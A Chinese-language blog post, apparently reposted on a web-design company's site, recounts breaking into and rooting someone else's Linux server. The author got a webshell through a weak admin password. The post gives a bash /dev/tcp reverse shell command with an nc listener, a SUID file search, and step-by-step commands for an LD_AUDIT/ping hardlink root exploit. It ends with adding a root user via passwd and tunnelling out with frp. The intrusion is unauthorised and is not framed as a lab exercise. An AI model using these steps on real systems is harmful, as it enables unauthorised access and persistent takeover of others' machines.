如何進行Linux提權(quán)

本篇文章給大家分享的是有關(guān)如何進行Linux提權(quán)，小編覺得挺實用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

成都創(chuàng)新互聯(lián)公司自2013年創(chuàng)立以來，先為源匯等服務(wù)建站，源匯等地企業(yè)，進行企業(yè)商務(wù)咨詢服務(wù)。為源匯企業(yè)網(wǎng)站制作PC+手機+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問題。

0X01前言

最近一個小老弟問我有沒有閑置的服務(wù)器，windows倒是有幾臺，但是小老弟是Linux系統(tǒng)管理員不熟悉windows，翻翻我的webshell找到了一兩臺Linux不過權(quán)限都很低，想著怎么著也要把它給提下來吧（吃了人家一頓飯嘿嘿）于是就有了本文，也GET到了新的提權(quán)姿勢。

0X02正文

shell怎么拿到的不詳說，弱口令后臺getshell。使用命令whoami查看當前權(quán)限。發(fā)現(xiàn)是nobody權(quán)限。nobody在linux中是一個不能登陸的帳號，一些服務(wù)進程如apache，aquid等都采用一些特殊的帳號來運行，比如nobody,news,games等等，這是就可以防止程序本身有安全問題的時候，不會被黑客獲得root權(quán)限。

   

說道Linux提權(quán)最先想到的肯定是利用利用內(nèi)核漏洞找到對應(yīng)版本相應(yīng)的exp直接進行溢出提權(quán)。

首先使用命令uname-a查看當前操作系統(tǒng)版本。發(fā)現(xiàn)是2.6.18-194.17.1.el5

比較老了，心里想著這還不分分鐘給你提下來。linux提權(quán)首先的獲取到一個交互式的shell。有好幾種方法可以實現(xiàn)，這里我用的是bash法。首先在你vps上監(jiān)聽一個端口使用命令nc-lvp port即可，然后在webshell上執(zhí)行bash-i >&    /dev/tcp/ip/port0>&1獲取到反彈回來的shell。

查找當前系統(tǒng)可使用的exp，上傳，給權(quán)限，gcc編譯，執(zhí)行，一條龍操作。不過這個過程可能會遇到各種問題。受害主機可能沒有裝gcc，gcc編譯提示缺少庫，能執(zhí)行卻依舊提升不了權(quán)限。反正我是各種exp用盡然而還是提不下來。

轉(zhuǎn)換思路，發(fā)現(xiàn)受害主機使用的是MySQL，于是一通亂翻終于找到了MySQL密碼，想利用MySQLudf提權(quán)，不過之前Linux下udf提權(quán)一直沒嘗試過，而且網(wǎng)上關(guān)于這方面的文章很少還基本都長一個樣，遂放棄。

MySQL密碼其實挺簡單的，我就想著數(shù)據(jù)庫密碼都這么簡單，會不會ssh也是個弱口令了，嘗試去連接，不能直連，遂放棄。

passwdshadow文件也沒權(quán)限讀。怎么辦？？各種搜索，發(fā)現(xiàn)還有一招SUID提權(quán)法。網(wǎng)上關(guān)于這方面的文章也比較少。SUID是Linux的一種權(quán)限機制，具有這種權(quán)限的文件會在其執(zhí)行時，使調(diào)用者暫時獲得該文件擁有者的權(quán)限。如果擁有SUID權(quán)限，那么就可以利用系統(tǒng)中的二進制文件和工具來進行root提權(quán)。首先要找到系統(tǒng)里使用SUID的文件，使用命令find/    -perm -u=s -type f 2>/dev/null

可以看到這么多文件都是都是帶SUID標識符的。這里我們使用ping。    

操作步驟如下（來自博客 https://blog.csdn.net/fffygapl/article/details/51783346）

切換到tmp目錄    
cd/tmp

創(chuàng)建一個exploit目錄    
mkdirexploit

查看ping命令帶suid權(quán)限    
ll/bin/ping

創(chuàng)建target文件硬鏈接    
ln/bin/ping /tmp/exploit/target

查看target文件權(quán)限    
ll/tmp/exploit/target

把target文件加載到內(nèi)存中    
exec3< /tmp/exploit/target

查看target在內(nèi)存中的情況    
“l(fā)l/proc/$$/fd/3”

刪除target文件    
rm-rf /tmp/exploit/

查看target在內(nèi)存中的情況是刪除狀態(tài)    
“l(fā)l/proc/$$/fd/3”

創(chuàng)建一個c語言代碼    
vimpayload.c

實際這里由于是反彈的bash所以不建議直接在bash下使用vim，可以自己本地寫好然后傳到tmp目錄下即可。還有如果ll命令不可用的話可以使用ls-l代替。

利用gcc編譯這段代碼    
gcc-W -fPIC -shared -o /tmp/exploit payload.c

提升到root權(quán)限    
LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3

執(zhí)行完，查看當前會話已經(jīng)是root

OK已經(jīng)是root權(quán)限了

接下的的操作就不細講了，新建一個用戶修改passwd添加到root用戶組然后使用frp進行內(nèi)網(wǎng)穿透，這里也有一個坑，在bash下用vi編輯passwd文件非常不方便，可以本地改好然后在替換掉passwd。附上一張ssh成功連接圖。

以上就是如何進行Linux提權(quán)，小編相信有部分知識點可能是我們?nèi)粘９ぷ鲿姷交蛴玫降?。希望你能通過這篇文章學(xué)到更多知識。更多詳情敬請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

標題名稱：如何進行Linux提權(quán)
本文URL：http://bm7419.com/article48/jjdghp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)頁設(shè)計公司、電子商務(wù)、網(wǎng)站排名、網(wǎng)站設(shè)計、微信小程序、網(wǎng)站改版

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)